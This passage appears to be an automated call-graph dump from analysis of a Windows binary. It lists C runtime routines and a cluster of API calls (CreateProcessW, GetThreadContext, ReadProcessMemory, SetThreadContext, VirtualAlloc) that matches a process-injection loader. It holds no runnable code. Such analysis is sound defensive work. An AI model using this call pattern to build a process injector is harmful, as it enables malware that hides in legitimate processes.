7369->7376 7371 c58e1e 7371->7236 7372->7358 7374 c52193 _doexit LeaveCriticalSection 7373->7374 7375 c58c5d 7374->7375 7375->7361 7376->7371 7378 c58b55 7377->7378 7379 c58b6d 7377->7379 7380 c534ed __free_osfhnd 68 API calls 7378->7380 7382 c534ed __free_osfhnd 68 API calls 7379->7382 7389 c58bb2 7379->7389 7381 c58b5a 7380->7381 7383 c534da __free_osfhnd 68 API calls 7381->7383 7384 c58b9b 7382->7384 7385 c58b62 7383->7385 7386 c534da __free_osfhnd 68 API calls 7384->7386 7385->7268 7387 c58ba2 7386->7387 7388 c54636 __openfile 6 API calls 7387->7388 7388->7389 7389->7268 7391 c58b48 __lseeki64_nolock 68 API calls 7390->7391 7392 c589da 7391->7392 7393 c589f3 SetFilePointer 7392->7393 7394 c589e2 7392->7394 7396 c58a0b GetLastError 7393->7396 7398 c589e7 7393->7398 7395 c534da __free_osfhnd 68 API calls 7394->7395 7395->7398 7397 c58a15 7396->7397 7396->7398 7399 c53500 __dosmaperr 68 API calls 7397->7399 7398->7294 7398->7295 7399->7398 7401 c58f15 __write_nolock 7400->7401 7402 c58f47 7401->7402 7403 c58f6e 7401->7403 7433 c58f3c 7401->7433 7405 c534ed __free_osfhnd 68 API calls 7402->7405 7406 c58fd6 7403->7406 7407 c58fb0 7403->7407 7404 c564ea __setmbcp_nolock 5 API calls 7408 c59637 7404->7408 7409 c58f4c 7405->7409 7411 c58fea 7406->7411 7415 c589bc __lseeki64_nolock 70 API calls 7406->7415 7410 c534ed __free_osfhnd 68 API calls 7407->7410 7408->7311 7412 c534da __free_osfhnd 68 API calls 7409->7412 7414 c58fb5 7410->7414 7459 c5a93a 7411->7459 7416 c58f53 7412->7416 7418 c534da __free_osfhnd 68 API calls 7414->7418 7415->7411 7419 c54636 __openfile 6 API calls 7416->7419 7417 c58ff5 7420 c5929b 7417->7420 7425 c54229 __getptd 68 API calls 7417->7425 7421 c58fbe 7418->7421 7419->7433 7423 c592ab 7420->7423 7424 c5956a WriteFile 7420->7424 7422 c54636 __openfile 6 API calls 7421->7422 7422->7433 7426 c59389 7423->7426 7448 c592bf 7423->7448 7428 c5959d GetLastError 7424->7428 7429 c5927d 7424->7429 7427 c59010 GetConsoleMode 7425->7427 7446 c59469 7426->7446 7451 c59398 7426->7451 7427->7420 7431 c5903b 7427->7431 7428->7429 7430 c595e8 7429->7430 7429->7433 7435 c595bb 7429->7435 7430->7433 7434 c534da __free_osfhnd 68 API calls 7430->7434 7431->7420 7432 c5904d GetConsoleCP 7431->7432 7432->7429 7456 c59070 7432->7456 7433->7404 7439 c5960b 7434->7439 7436 c595c6 7435->7436 7437 c595da 7435->7437 7441 c534da __free_osfhnd 68 API calls 7436->7441 7444 c53500 __dosmaperr 68 API calls 7437->7444 7438 c5932d WriteFile 7438->7428 7438->7448 7445 c534ed __free_osfhnd 68 API calls 7439->7445 7440 c594cf WideCharToMultiByte 7440->7428 7442 c59506 WriteFile 7440->7442 7449 c595cb 7441->7449 7442->7446 7447 c5953d GetLastError 7442->7447 7443 c5940d WriteFile 7443->7428 7443->7451 7444->7433 7445->7433 7446->7429 7446->7430 7446->7440 7446->7442 7447->7446 7448->7429 7448->7430 7448->7438 7450 c534ed __free_osfhnd 68 API calls 7449->7450 7450->7433 7451->7429 7451->7430 7451->7443 7453 c5a920 80 API calls __fassign 7453->7456 7454 c5911c WideCharToMultiByte 7454->7429 7455 c5914d WriteFile 7454->7455 7455->7428 7455->7456 7456->7428 7456->7429 7456->7453 7456->7454 7457 c5a744 11 API calls __putwch_nolock 7456->7457 7458 c591a1 WriteFile 7456->7458 7468 c5a0c4 7456->7468 7457->7456 7458->7428 7458->7456 7460 c5a947 7459->7460 7461 c5a956 7459->7461 7462 c534da __free_osfhnd 68 API calls 7460->7462 7464 c534da __free_osfhnd 68 API calls 7461->7464 7467 c5a97a 7461->7467 7463 c5a94c 7462->7463 7463->7417 7465 c5a96a 7464->7465 7466 c54636 __openfile 6 API calls 7465->7466 7466->7467 7467->7417 7469 c5a08c __isleadbyte_l 78 API calls 7468->7469 7470 c5a0d3 7469->7470 7470->7456 7474 c58c5f LeaveCriticalSection 7471->7474 7473 c59713 7473->7342 7474->7473 7475->7224 7477 c586ce 7476->7477 7488 c586c7 _strncmp 7476->7488 7478 c515de _LocaleUpdate::_LocaleUpdate 78 API calls 7477->7478 7479 c586da 7478->7479 7480 c5870d 7479->7480 7481 c58738 7479->7481 7479->7488 7482 c534da __free_osfhnd 68 API calls 7480->7482 7484 c534da __free_osfhnd 68 API calls 7481->7484 7481->7488 7483 c58712 7482->7483 7485 c54636 __openfile 6 API calls 7483->7485 7486 c58745 7484->7486 7485->7488 7487 c54636 __openfile 6 API calls 7486->7487 7487->7488 7488->7145 7490 c515de _LocaleUpdate::_LocaleUpdate 78 API calls 7489->7490 7491 c58486 7490->7491 7492 c584ce 7491->7492 7493 c584a8 7491->7493 7503 c54a16 7491->7503 7495 c58501 7492->7495 7496 c584d3 7492->7496 7504 c5a1df 7493->7504 7498 c534da __free_osfhnd 68 API calls 7495->7498 7495->7503 7497 c534da __free_osfhnd 68 API calls 7496->7497 7499 c584d8 7497->7499 7500 c5850e 7498->7500 7501 c54636 __openfile 6 API calls 7499->7501 7502 c54636 __openfile 6 API calls 7500->7502 7501->7503 7502->7503 7503->7118 7503->7121 7505 c5a1ef 7504->7505 7506 c5a221 7504->7506 7505->7506 7507 c5a1f4 7505->7507 7513 c5a0ed 7506->7513 7509 c534da __free_osfhnd 68 API calls 7507->7509 7511 c5a1f9 7509->7511 7510 c5a209 7510->7503 7512 c54636 __openfile 6 API calls 7511->7512 7512->7510 7514 c5a103 7513->7514 7527 c5a128 ___ascii_strnicmp 7513->7527 7515 c515de _LocaleUpdate::_LocaleUpdate 78 API calls 7514->7515 7516 c5a10e 7515->7516 7517 c5a113 7516->7517 7518 c5a148 7516->7518 7519 c534da __free_osfhnd 68 API calls 7517->7519 7521 c5a152 7518->7521 7528 c5a17a 7518->7528 7520 c5a118 7519->7520 7522 c54636 __openfile 6 API calls 7520->7522 7523 c534da __free_osfhnd 68 API calls 7521->7523 7522->7527 7524 c5a157 7523->7524 7525 c54636 __openfile 6 API calls 7524->7525 7525->7527 7526 c5aa83 103 API calls __tolower_l 7526->7528 7527->7510 7528->7526 7528->7527 7530 c547b1 7529->7530 7531 c547d0 LeaveCriticalSection 7529->7531 7530->7531 7532 c547b8 7530->7532 7531->7124 7535 c52193 LeaveCriticalSection 7532->7535 7534 c547cd 7534->7124 7535->7534 7537 c54761 EnterCriticalSection 7536->7537 7538 c5473f 7536->7538 7539 c51ce2 7537->7539 7538->7537 7540 c54747 7538->7540 7542 c51c08 7539->7542 7541 c5226d __lock 68 API calls 7540->7541 7541->7539 7543 c51c28 7542->7543 7544 c51c18 7542->7544 7546 c51c3a 7543->7546 7594 c519fd 7543->7594 7545 c534da __free_osfhnd 68 API calls 7544->7545 7553 c51c1d 7545->7553 7557 c55a1f 7546->7557 7554 c51d0d 7553->7554 7555 c547a0 __fsopen 2 API calls 7554->7555 7556 c51d15 7555->7556 7556->7046 7558 c55a38 7557->7558 7562 c51c48 7557->7562 7559 c55549 __fileno 68 API calls 7558->7559 7558->7562 7560 c55a53 7559->7560 7561 c59639 __locking 102 API calls 7560->7561 7561->7562 7563 c55549 7562->7563 7564 c51c7a 7563->7564 7565 c55558 7563->7565 7569 c55943 7564->7569 7566 c534da __free_osfhnd 68 API calls 7565->7566 7567 c5555d 7566->7567 7568 c54636 __openfile 6 API calls 7567->7568 7568->7564 7570 c5594f __setmbcp 7569->7570 7571 c55957 7570->7571 7572 c55972 7570->7572 7573 c534ed __free_osfhnd 68 API calls 7571->7573 7574 c55980 7572->7574 7577 c559c1 7572->7577 7575 c5595c 7573->7575 7576 c534ed __free_osfhnd 68 API calls 7574->7576 7578 c534da __free_osfhnd 68 API calls 7575->7578 7579 c55985 7576->7579 7581 c58bbf ___lock_fhandle 69 API calls 7577->7581 7587 c55964 __setmbcp 7578->7587 7580 c534da __free_osfhnd 68 API calls 7579->7580 7582 c5598c 7580->7582 7583 c559c7 7581->7583 7584 c54636 __openfile 6 API calls 7582->7584 7585 c559d4 7583->7585 7586 c559ea 7583->7586 7584->7587 7588 c558ce __lseek_nolock 70 API calls 7585->7588 7589 c534da __free_osfhnd 68 API calls 7586->7589 7587->7553 7590 c559e2 7588->7590 7591 c559ef 7589->7591 7611 c55a15 7590->7611 7592 c534ed __free_osfhnd 68 API calls 7591->7592 7592->7590 7595 c51a30 7594->7595 7596 c51a10 7594->7596 7597 c55549 __fileno 68 API calls 7595->7597 7598 c534da __free_osfhnd 68 API calls 7596->7598 7600 c51a36 7597->7600 7599 c51a15 7598->7599 7601 c54636 __openfile 6 API calls 7599->7601 7602 c55943 __locking 72 API calls 7600->7602 7610 c51a25 7601->7610 7603 c51a4b 7602->7603 7604 c51abf 7603->7604 7606 c51a7a 7603->7606 7603->7610 7605 c534da __free_osfhnd 68 API calls 7604->7605 7605->7610 7607 c55943 __locking 72 API calls 7606->7607 7606->7610 7608 c51b1a 7607->7608 7609 c55943 __locking 72 API calls 7608->7609 7608->7610 7609->7610 7610->7546 7614 c58c5f LeaveCriticalSection 7611->7614 7613 c55a1d 7613->7587 7614->7613 7616 c547a0 __fsopen 2 API calls 7615->7616 7617 c51c06 7616->7617 7617->7059 7619 c51956 __setmbcp 7618->7619 7620 c5199f 7619->7620 7621 c5196a _memset 7619->7621 7622 c51994 __setmbcp 7619->7622 7623 c5472d __lock_file 69 API calls 7620->7623 7624 c534da __free_osfhnd 68 API calls 7621->7624 7622->7062 7625 c519a7 7623->7625 7627 c51984 7624->7627 7631 c51740 7625->7631 7629 c54636 __openfile 6 API calls 7627->7629 7629->7622 7635 c5175e _memset 7631->7635 7637 c5177c 7631->7637 7632 c51767 7633 c534da __free_osfhnd 68 API calls 7632->7633 7634 c5176c 7633->7634 7636 c54636 __openfile 6 API calls 7634->7636 7635->7632 7635->7637 7643 c517bb 7635->7643 7636->7637 7647 c519d6 7637->7647 7639 c51905 _memset 7645 c534da __free_osfhnd 68 API calls 7639->7645 7640 c518d9 _memset 7644 c534da __free_osfhnd 68 API calls 7640->7644 7641 c55549 __fileno 68 API calls 7641->7643 7643->7637 7643->7639 7643->7640 7643->7641 7650 c5544c 7643->7650 7680 c54d5f 7643->7680 7700 c5557b 7643->7700 7644->7634 7645->7634 7648 c547a0 __fsopen 2 API calls 7647->7648 7649 c519de 7648->7649 7649->7622 7651 c55458 __setmbcp 7650->7651 7652 c55460 7651->7652 7653 c5547b 7651->7653 7655 c534ed __free_osfhnd 68 API calls 7652->7655 7654 c55489 7653->7654 7659 c554ca 7653->7659 7656 c534ed __free_osfhnd 68 API calls 7654->7656 7657 c55465 7655->7657 7658 c5548e 7656->7658 7660 c534da __free_osfhnd 68 API calls 7657->7660 7661 c534da __free_osfhnd 68 API calls 7658->7661 7662 c554d7 7659->7662 7663 c554eb 7659->7663 7673 c5546d __setmbcp 7660->7673 7665 c55495 7661->7665 7666 c534ed __free_osfhnd 68 API calls 7662->7666 7664 c58bbf ___lock_fhandle 69 API calls 7663->7664 7667 c554f1 7664->7667 7671 c54636 __openfile 6 API calls 7665->7671 7668 c554dc 7666->7668 7669 c55514 7667->7669 7670 c554fe 7667->7670 7672 c534da __free_osfhnd 68 API calls 7668->7672 7675 c534da __free_osfhnd 68 API calls 7669->7675 7709 c54e8a 7670->7709 7671->7673 7672->7665 7673->7643 7677 c55519 7675->7677 7676 c5550c 7778 c5553f 7676->7778 7678 c534ed __free_osfhnd 68 API calls 7677->7678 7678->7676 7681 c54d6f 7680->7681 7685 c54d8c 7680->7685 7682 c534da __free_osfhnd 68 API calls 7681->7682 7683 c54d74 7682->7683 7686 c54636 __openfile 6 API calls 7683->7686 7684 c54d84 7684->7643 7685->7684 7687 c54dc1 7685->7687 7782 c58973 7685->7782 7686->7684 7689 c55549 __fileno 68 API calls 7687->7689 7690 c54dd5 7689->7690 7691 c5544c __read 80 API calls 7690->7691 7692 c54ddc 7691->7692 7692->7684 7693 c55549 __fileno 68 API calls 7692->7693 7694 c54dff 7693->7694 7694->7684 7695 c55549 __fileno 68 API calls 7694->7695 7696 c54e0b 7695->7696 7696->7684 7697 c55549 __fileno 68 API calls 7696->7697 7698 c54e17 7697->7698 7699 c55549 __fileno 68 API calls 7698->7699 7699->7684 7704 c5558b ___crtGetEnvironmentStringsA 7700->7704 7705 c5558f _memset 7700->7705 7701 c55594 7702 c534da __free_osfhnd 68 API calls 7701->7702 7703 c55599 7702->7703 7707 c54636 __openfile 6 API calls 7703->7707 7704->7643 7705->7701 7705->7704 7706 c555de 7705->7706 7706->7704 7708 c534da __free_osfhnd 68 API calls 7706->7708 7707->7704 7708->7703 7710 c54ea6 7709->7710 7711 c54ec1 7709->7711 7712 c534ed __free_osfhnd 68 API calls 7710->7712 7713 c54ed0 7711->7713 7715 c54ef7 7711->7715 7714 c54eab 7712->7714 7716 c534ed __free_osfhnd 68 API calls 7713->7716 7718 c534da __free_osfhnd 68 API calls 7714->7718 7717 c54f16 7715->7717 7732 c54f2a 7715->7732 7719 c54ed5 7716->7719 7720 c534ed __free_osfhnd 68 API calls 7717->7720 7729 c54eb3 7718->7729 7722 c534da __free_osfhnd 68 API calls 7719->7722 7725 c54f1b 7720->7725 7721 c54f82 7724 c534ed __free_osfhnd 68 API calls 7721->7724 7723 c54edc 7722->7723 7726 c54636 __openfile 6 API calls 7723->7726 7727 c54f87 7724->7727 7728 c534da __free_osfhnd 68 API calls 7725->7728 7726->7729 7730 c534da __free_osfhnd 68 API calls 7727->7730 7731 c54f22 7728->7731 7729->7676 7730->7731 7735 c54636 __openfile 6 API calls 7731->7735 7732->7721 7732->7729 7733 c54f5e 7732->7733 7734 c54fa3 7732->7734 7733->7721 7740 c54f69 ReadFile 7733->7740 7737 c5640b __malloc_crt 68 API calls 7734->7737 7735->7729 7741 c54fb9 7737->7741 7738 c55095 7739 c55410 GetLastError 7738->7739 7747 c550a9 7738->7747 7744 c55296 7739->7744 7745 c5541d 7739->7745 7740->7738 7740->7739 7742 c54fc1 7741->7742 7743 c54fdf 7741->7743 7746 c534da __free_osfhnd 68 API calls 7742->7746 7748 c589bc __lseeki64_nolock 70 API calls 7743->7748 7752 c53500 __dosmaperr 68 API calls 7744->7752 7759 c5521b 7744->7759 7749 c534da __free_osfhnd 68 API calls 7745->7749 7751 c54fc6 7746->7751 7758 c550c5 7747->7758 7747->7759 7763 c552db 7747->7763 7753 c54feb 7748->7753 7750 c55422 7749->7750 7754 c534ed __free_osfhnd 68 API calls 7750->7754 7755 c534ed __free_osfhnd 68 API calls 7751->7755 7752->7759 7753->7740 7754->7759 7755->7729 7756 c5637d ___endstdio 68 API calls 7756->7729 7757 c551a8 7757->7759 7767 c55216 7757->7767 7768 c55223 7757->7768 7774 c551e0 7757->7774 7758->7757 7760 c5512b ReadFile 7758->7760 7759->7729 7759->7756 7762 c55149 GetLastError 7760->7762 7776 c55153 7760->7776 7761 c55353 ReadFile 7764 c55372 GetLastError 7761->7764 7773 c5537c 7761->7773 7762->7758 7762->7776 7763->7759 7763->7761 7764->7763 7764->7773 7765 c5526c MultiByteToWideChar 7765->7759 7766 c55290 GetLastError 7765->7766 7766->7744 7769 c534da __free_osfhnd 68 API calls 7767->7769 7771 c5525a 7768->7771 7768->7774 7769->7759 7770 c589bc __lseeki64_nolock 70 API calls 7770->7773 7775 c589bc __lseeki64_nolock 70 API calls 7771->7775 7772 c589bc __lseeki64_nolock 70 API calls 7772->7776 7773->7763 7773->7770 7774->7765 7777 c55269 7775->7777 7776->7758 7776->7772 7777->7765 7781 c58c5f LeaveCriticalSection 7778->7781 7780 c55547 7780->7673 7781->7780 7783 c5640b __malloc_crt 68 API calls 7782->7783 7784 c58988 7783->7784 7784->7687 7919 c52dc0 7920 c52dec 7919->7920 7921 c52df9 7919->7921 7922 c564ea __setmbcp_nolock 5 API calls 7920->7922 7923 c564ea __setmbcp_nolock 5 API calls 7921->7923 7922->7921 7924 c52e09 __except_handler4 __IsNonwritableInCurrentImage 7923->7924 7925 c52e8c 7924->7925 7926 c52e62 __except_handler4 7924->7926 7935 c54d2e RtlUnwind 7924->7935 7926->7925 7927 c52e7c 7926->7927 7928 c564ea __setmbcp_nolock 5 API calls 7926->7928 7929 c564ea __setmbcp_nolock 5 API calls 7927->7929 7928->7927 7929->7925 7931 c52edb __except_handler4 7932 c52f0f 7931->7932 7933 c564ea __setmbcp_nolock 5 API calls 7931->7933 7934 c564ea __setmbcp_nolock 5 API calls 7932->7934 7933->7932 7934->7926 7935->7931 8007 27f4159 8008 27f3885 10 API calls 8007->8008 8009 27f4163 8008->8009 8032 c59d43 8033 c52fac __amsg_exit 68 API calls 8032->8033 8034 c59d4a 8033->8034 8035 c54243 8036 c5424f __setmbcp 8035->8036 8037 c54267 8036->8037 8038 c5637d ___endstdio 68 API calls 8036->8038 8040 c54351 __setmbcp 8036->8040 8039 c54275 8037->8039 8041 c5637d ___endstdio 68 API calls 8037->8041 8038->8037 8042 c54283 8039->8042 8043 c5637d ___endstdio 68 API calls 8039->8043 8041->8039 8044 c54291 8042->8044 8045 c5637d ___endstdio 68 API calls 8042->8045 8043->8042 8046 c5429f 8044->8046 8047 c5637d ___endstdio 68 API calls 8044->8047 8045->8044 8048 c542ad 8046->8048 8049 c5637d ___endstdio 68 API calls 8046->8049 8047->8046 8050 c542bb 8048->8050 8051 c5637d ___endstdio 68 API calls 8048->8051 8049->8048 8052 c542cc 8050->8052 8053 c5637d ___endstdio 68 API calls 8050->8053 8051->8050 8054 c5226d __lock 68 API calls 8052->8054 8053->8052 8055 c542d4 8054->8055 8056 c542e0 InterlockedDecrement 8055->8056 8062 c542f9 8055->8062 8058 c542eb 8056->8058 8056->8062 8060 c5637d ___endstdio 68 API calls 8058->8060 8058->8062 8060->8062 8061 c5226d __lock 68 API calls 8063 c5430d 8061->8063 8071 c5435d 8062->8071 8064 c5433e 8063->8064 8065 c53e15 ___removelocaleref 8 API calls 8063->8065 8074 c54369 8064->8074 8069 c54322 8065->8069 8068 c5637d ___endstdio 68 API calls 8068->8040 8069->8064 8070 c53c3d ___freetlocinfo 68 API calls 8069->8070 8070->8064 8077 c52193 LeaveCriticalSection 8071->8077 8073 c54306 8073->8061 8078 c52193 LeaveCriticalSection 8074->8078 8076 c5434b 8076->8068 8077->8073 8078->8076 7785 27f3377 7786 27f337e 7785->7786 7787 27f338a 7786->7787 7789 27f387c ExitProcess 7786->7789 7790 27f2b2a 7786->7790 7805 27f297f GetPEB 7790->7805 7792 27f2cd3 7792->7786 7793 27f2ce1 CreateProcessW 7794 27f2d10 GetThreadContext 7793->7794 7798 27f2d0b 7793->7798 7795 27f2d30 ReadProcessMemory 7794->7795 7794->7798 7796 27f2b38 7795->7796 7795->7798 7796->7792 7796->7793 7796->7798 7800 27f3de5 11 API calls 7796->7800 7802 27f2f95 SetThreadContext 7796->7802 7804 27f3c36 11 API calls 7796->7804 7806 27f3ccb 7796->7806 7815 27f3a84 7796->7815 7824 27f3b85 7796->7824 7798->7792 7833 27f3c36 7798->7833 7800->7796 7802->7796 7802->7798 7804->7796 7805->7796 7807 27f3ce6 7806->7807 7842 27f2a5e GetPEB 7807->7842 7809 27f3d07 7810 27f3dbf 7809->7810 7811 27f3d0f 7809->7811 7859 27f4111 7810->7859 7844 27f3885 7811->7844 7814 27f3da6 7814->7796 7816 27f3a9f 7815->7816 7817 27f2a5e GetPEB 7816->7817 7818 27f3ac0 7817->7818 7819 27f3ac8 7818->7819 7820 27f3b52 7818->7820 7822 27f3885 10 API calls 7819->7822 7869 27f4135 7820->7869 7823 27f3b39 7822->7823 7823->7796 7825 27f3ba0 7824->7825 7826 27f2a5e GetPEB 7825->7826 7827 27f3bc1 7826->7827 7828 27f3c0b 7827->7828 7829 27f3bc5 7827->7829 7872 27f4147 7828->7872 7830 27f3885 10 API calls 7829->7830 7832 27f3c00 7830->7832 7832->7796 7834 27f3c49 7833->7834 7835 27f2a5e GetPEB 7834->7835 7836 27f3c6a 7835->7836 7837 27f3c6e 7836->7837 7838 27f3cb4 7836->7838 7840 27f3885 10 API calls 7837->7840 7875 27f40ff 7838->7875 7841 27f3ca9 7840->7841 7841->7792 7843 27f2a80 7842->7843 7843->7809 7862 27f297f GetPEB 7844->7862 7846 27f38ce 7863 27f2a29 GetPEB 7846->7863 7849 27f395b 7850 27f396c VirtualAlloc 7849->7850 7853 27f3a30 7849->7853 7851 27f3982 ReadFile 7850->7851 7850->7853 7852 27f3997 VirtualAlloc 7851->7852 7851->7853 7852->7853 7856 27f39b8 7852->7856 7854 27f3a6e VirtualFree 7853->7854 7855 27f3a79 7853->7855 7854->7855 7855->7814 7856->7853 7857 27f3a1f FindCloseChangeNotification 7856->7857 7858 27f3a23 VirtualFree 7856->7858 7857->7858 7858->7853 7860 27f3885 10 API calls 7859->7860 7861 27f411b 7860->7861 7861->7814 7862->7846 7864 27f2a3c 7863->7864 7866 27f2a51 CreateFileW 7864->7866 7867 27f2a9b GetPEB 7864->7867 7866->7849 7866->7853 7868 27f2abf 7867->7868 7868->7864 7870 27f3885 10 API calls 7869->7870 7871 27f413f 7870->7871 7871->7823 7873 27f3885 10 API calls 7872->7873 7874 27f4151 7873->7874 7874->7832 7876 27f3885 10 API calls 7875->7876 7877 27f4109 7876->7877 7877->7841 7878 27f31d7 7890 27f297f GetPEB 7878->7890 7880 27f3263 7891 27f3158 7880->7891 7882 27f326b 7883 27f331a CreateFileW 7882->7883 7884 27f32fe 7882->7884 7883->7884 7885 27f3344 VirtualAlloc ReadFile 7883->7885 7885->7884 7888 27f3371 7885->7888 7886 27f338a 7887 27f2b2a 15 API calls 7887->7888 7888->7886 7888->7887 7889 27f387c ExitProcess 7888->7889 7890->7880 7904 27f297f GetPEB 7891->7904 7893 27f316c 7905 27f297f GetPEB 7893->7905 7895 27f317f 7906 27f297f GetPEB 7895->7906 7897 27f3192 7907 27f30fa 7897->7907 7899 27f31a0 7900 27f31bc VirtualAllocExNuma 7899->7900 7901 27f31c9 7900->7901 7912 27f305a 7901->7912 7904->7893 7905->7895 7906->7897 7917 27f297f GetPEB 7907->7917 7909 27f310a 7910 27f3110 GetSystemInfo 7909->7910 7911 27f313b 7910->7911 7911->7899 7918 27f297f GetPEB 7912->7918 7914 27f3066 7915 27f3086 VirtualAlloc 7914->7915 7916 27f30a3 7915->7916 7916->7882 7917->7909 7918->7914 8119 c5470d 8126 c55ba9 8119->8126 8122 c54720 8124 c5637d ___endstdio 68 API calls 8122->8124 8125 c5472b 8124->8125 8139 c55acf 8126->8139 8128 c54712 8128->8122 8129 c57bc8 8128->8129 8130 c57bd4 __setmbcp 8129->8130 8131 c5226d __lock 68 API calls 8130->8131 8134 c57be0 8131->8134 8132 c57c49 8169 c57c5e 8132->8169 8134->8132 8136 c57c1e DeleteCriticalSection 8134->8136 8156 c5a2b4 8134->8156 8135 c57c55 __setmbcp 8135->8122 8138 c5637d ___endstdio 68 API calls 8136->8138 8138->8134 8140 c55adb __setmbcp 8139->8140 8141 c5226d __lock 68 API calls 8140->8141 8145 c55aea 8141->8145 8142 c55b82 8152 c55ba0 8142->8152 8144 c5476e _flsall 69 API calls 8144->8145 8145->8142 8145->8144 8148 c55a87 106 API calls __fflush_nolock 8145->8148 8149 c55b71 8145->8149 8146 c55b8e __setmbcp 8146->8128 8148->8145 8150 c547dc __getstream 2 API calls 8149->8150 8151 c55b7f 8150->8151 8151->8145 8155 c52193 LeaveCriticalSection 8152->8155 8154 c55ba7 8154->8146 8155->8154 8157 c5a2c0 __setmbcp 8156->8157 8158 c5a2d4 8157->8158 8159 c5a2f1 8157->8159 8160 c534da __free_osfhnd 68 API calls 8158->8160 8162 c5472d __lock_file 69 API calls 8159->8162 8167 c5a2e9 __setmbcp 8159->8167 8161 c5a2d9 8160->8161 8163 c54636 __openfile 6 API calls 8161->8163 8164 c5a309 8162->8164 8163->8167 8172 c5a23d 8164->8172 8167->8134 8222 c52193 LeaveCriticalSection 8169->8222 8171 c57c65 8171->8135 8173 c5a251 8172->8173 8174 c5a26d 8172->8174 8175 c534da __free_osfhnd 68 API calls 8173->8175 8176 c5a266 8174->8176 8178 c55a1f __flush 102 API calls 8174->8178 8177 c5a256 8175->8177 8188 c5a328 8176->8188 8179 c54636 __openfile 6 API calls 8177->8179 8180 c5a279 8178->8180 8179->8176 8191 c5af05 8180->8191 8183 c55549 __fileno 68 API calls 8184 c5a287 8183->8184 8195 c5a582 8184->8195 8186 c5a28d 8186->8176 8187 c5637d ___endstdio 68 API calls 8186->8187 8187->8176 8189 c547a0 __fsopen 2 API calls 8188->8189 8190 c5a32e 8189->8190 8190->8167 8192 c5af15 8191->8192 8193 c5a281 8191->8193 8192->8193 8194 c5637d ___endstdio 68 API calls 8192->8194 8193->8183 8194->8193 8196 c5a58e __setmbcp 8195->8196 8197 c5a596 8196->8197 8198 c5a5b1 8196->8198 8199 c534ed __free_osfhnd 68 API calls 8197->8199 8200 c5a5bf 8198->8200 8205 c5a600 8198->8205 8201 c5a59b 8199->8201 8202 c534ed __free_osfhnd 68 API calls 8200->8202 8203 c534da __free_osfhnd 68 API calls 8201->8203 8204 c5a5c4 8202->8204 8215 c5a5a3 __setmbcp 8203->8215 8207 c534da __free_osfhnd 68 API calls 8204->8207 8206 c58bbf ___lock_fhandle 69 API calls 8205->8206 8208 c5a606 8206->8208 8209 c5a5cb 8207->8209 8210 c5a621 8208->8210 8211 c5a613 8208->8211 8212 c54636 __openfile 6 API calls 8209->8212 8214 c534da __free_osfhnd 68 API calls 8210->8214 8213 c5a4e6 __close_nolock 71 API calls 8211->8213 8212->8215 8216 c5a61b 8213->8216 8214->8216 8215->8186 8218 c5a645 8216->8218 8221 c58c5f LeaveCriticalSection 8218->8221 8220 c5a64d 8220->8215 8221->8220 8222->8171 8079 c5404f TlsAlloc 8099 c51e6b 8102 c55c03 8099->8102 8103 c541b0 __getptd_noexit 68 API calls 8102->8103 8104 c51e7c 8103->8104 8080 c56355 8081 c56361 SetLastError 8080->8081 8082 c56369 __setmbcp 8080->8082 8081->8082 8083 c5af55 8084 c5af66 8083->8084 8085 c5af6e 8083->8085 8084->8085 8087 c5af6b CloseHandle 8084->8087 8086 c5af80 8085->8086 8088 c5af7d CloseHandle 8085->8088 8087->8085 8088->8086 5932 c53fd4 5935 c53f62 TlsGetValue 5932->5935 5936 c53f9b GetModuleHandleW 5935->5936 5937 c53f7a 5935->5937 5939 c53fb6 GetProcAddress 5936->5939 5940 c53fab 5936->5940 5937->5936 5938 c53f84 TlsGetValue 5937->5938 5943 c53f8f 5938->5943 5942 c53f93 5939->5942 5947 c52f7c 5940->5947 5945 c53fc6 RtlEncodePointer 5942->5945 5946 c53fce 5942->5946 5943->5936 5943->5942 5945->5946 5948 c52f87 Sleep GetModuleHandleW 5947->5948 5949 c52fa5 5948->5949 5950 c52fa9 5948->5950 5949->5948 5949->5950 5950->5939 5950->5946 8010 c55bf4 SetUnhandledExceptionFilter 7936 c567d0 7937 c567d3 7936->7937 7940 c59d4c 7937->7940 7941 c59d72 7940->7941 7942 c59d6b 7940->7942 7952 c5684b 7941->7952 7943 c532b4 __NMSG_WRITE 68 API calls 7942->7943 7943->7941 7947 c59e5b 7976 c53232 7947->7976 7948 c59d83 _memset 7948->7947 7950 c59e1b SetUnhandledExceptionFilter UnhandledExceptionFilter 7948->7950 7950->7947 7953 c53fdd __decode_pointer 6 API calls 7952->7953 7954 c56856 7953->7954 7954->7948 7955 c56858 7954->7955 7958 c56864 __setmbcp 7955->7958 7956 c568c0 7957 c568a1 7956->7957 7962 c568cf 7956->7962 7961 c53fdd __decode_pointer 6 API calls 7957->7961 7958->7956 7958->7957 7959 c5688b 7958->7959 7963 c56887 7958->7963 7960 c541b0 __getptd_noexit 68 API calls 7959->7960 7964 c56890 _siglookup 7960->7964 7961->7964 7965 c534da __free_osfhnd 68 API calls 7962->7965 7963->7959 7963->7962 7967 c56936 7964->7967 7969 c53232 _abort 68 API calls 7964->7969 7970 c56899 __setmbcp 7964->7970 7966 c568d4 7965->7966 7968 c54636 __openfile 6 API calls 7966->7968 7971 c56941 7967->7971 7972 c5226d __lock 68 API calls 7967->7972 7968->7970 7969->7967 7970->7948 7973 c53fd4 _raise 7 API calls 7971->7973 7974 c56976 7971->7974 7972->7971 7973->7974 7979 c569cc 7974->7979 7984 c530f0 7976->7984 7978 c53243 7980 c569d2 7979->7980 7981 c569d9 7979->7981 7983 c52193 LeaveCriticalSection 7980->7983 7981->7970 7983->7981 7985 c530fc __setmbcp 7984->7985 7986 c5226d __lock 68 API calls 7985->7986 7987 c53103 7986->7987 7989 c53fdd __decode_pointer 6 API calls 7987->7989 7993 c531bc __initterm 7987->7993 7991 c5313a 7989->7991 7991->7993 7995 c53fdd __decode_pointer 6 API calls 7991->7995 7992 c53204 __setmbcp 7992->7978 8001 c53207 7993->8001 7999 c5314f 7995->7999 7996 c531fb 7997 c53000 __mtinitlocknum 3 API calls 7996->7997 7997->7992 7998 c53fd4 7 API calls _raise 7998->7999 7999->7993 7999->7998 8000 c53fdd 6 API calls __decode_pointer 7999->8000 8000->7999 8002 c531e8 8001->8002 8003 c5320d 8001->8003 8002->7992 8005 c52193 LeaveCriticalSection 8002->8005 8006 c52193 LeaveCriticalSection 8003->8006 8005->7996 8006->8002 8015 c55bb2 8016 c55bee 8015->8016 8017 c55bc4 8015->8017 8017->8016 8019 c567ac 8017->8019 8020 c567b8 __setmbcp 8019->8020 8021 c54229 __getptd 68 API calls 8020->8021 8022 c567bd 8021->8022 8023 c59d4c _abort 70 API calls 8022->8023 8024 c567df __setmbcp 